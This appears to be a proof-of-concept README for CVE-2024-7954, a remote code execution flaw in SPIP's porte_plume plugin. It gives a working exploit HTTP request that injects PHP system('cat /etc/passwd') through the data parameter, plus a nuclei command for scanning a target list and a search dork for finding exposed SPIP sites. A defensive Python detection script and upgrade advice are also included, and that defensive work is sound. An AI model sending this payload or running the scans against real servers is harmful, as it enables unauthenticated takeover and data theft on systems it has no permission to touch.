# RCE-CVE-2024-7954
## Description
The **porte_plume** plugin used by SPIP versions prior to **4.30-alpha2**, **4.2.13**, and **4.1.16** is vulnerable to critical **remote code execution (RCE)**. A remote, unauthenticated attacker can execute arbitrary PHP code as the SPIP user by sending a crafted HTTP request. Successful exploitation lets the attacker run malicious commands on the server, which could lead to unauthorized access, data breaches, or further system compromise.
### Vulnerability Details
- **Affected Software:** SPIP (prior to versions 4.30-alpha2, 4.2.13, and 4.1.16)
- **Type of Vulnerability:** Remote Code Execution (RCE)
- **Severity Level:** Critical
- **Exploitability:** Remote and unauthenticated attackers can exploit this vulnerability.
## Exploit
## Nuclei Scan
```
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
```
An example of a crafted HTTP request that can be used to exploit this vulnerability is as follows:
```
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
```
### Explanation of the Exploit:
- The `POST` request is directed to the **porte_plume_previsu** action of SPIP's index.php file.
- The **data** parameter contains a payload that leverages PHP's `system()` function to execute a command (in this case, `cat /etc/passwd`), which reads the contents of the password file.
- By changing the command within the `system()` function, an attacker could execute any PHP code on the server, leading to severe consequences.
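
For defenders, the request shape above gives a usable detection signature: the `porte_plume_previsu` action combined with a PHP open tag in the `data` parameter. The sketch below is an added example, not part of the original PoC or of SPIP; it assumes a reverse proxy or WAF that logs request bodies, and the record layout (`client`, `uri`, `body`) and sample records are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

ACTION = "porte_plume_previsu"
# Heuristic: any PHP open tag ("<?php", "<?=", "<?") except an XML declaration.
PHP_TAG = re.compile(r"<\?(?!xml)", re.IGNORECASE)

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(uri, body):
    """True if the request reaches the preview action with PHP in `data`."""
    query = parse_qs(urlsplit(uri).query)
    form = parse_qs(body)
    # The action and payload may sit in the query string or the form body.
    if ACTION not in query.get("action", []) + form.get("action", []):
        return False
    values = form.get("data", []) + query.get("data", [])
    return any(PHP_TAG.search(decode_fully(v)) for v in values)

def scan(records):
    """Return the client addresses of records that match the signature."""
    return [r["client"] for r in records if is_suspicious(r["uri"], r["body"])]

# Constructed sample records (documentation-range addresses, harmless payloads).
SAMPLE = [
    {"client": "192.0.2.10", "uri": "/index.php?action=porte_plume_previsu",
     "body": "data=AA_[->URL<?php echo 1 ?>]_BB"},
    {"client": "192.0.2.11", "uri": "/spip.php?action=porte_plume_previsu",
     "body": "data=Hello+%7B%7Bworld%7D%7D"},
    {"client": "198.51.100.7", "uri": "/index.php",
     "body": "action=porte_plume_previsu&data=%253C%253Fphp%2520echo%25201%2520%253F%253E"},
    {"client": "198.51.100.8", "uri": "/index.php?action=other",
     "body": "data=<?php echo 1 ?>"},
]

if __name__ == "__main__":
    for client in scan(SAMPLE):
        print("suspicious porte_plume_previsu request from", client)
```

A match is a triage signal, not proof of compromise; the fix remains upgrading SPIP to one of the patched releases listed above.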
## Shodan Dork
To identify potentially vulnerable SPIP installations, the following Shodan search query can be used:
```
app="SPIP"
```
This vulnerability underscores the importance of keeping software up to date and implementing robust security measures to protect against exploitation.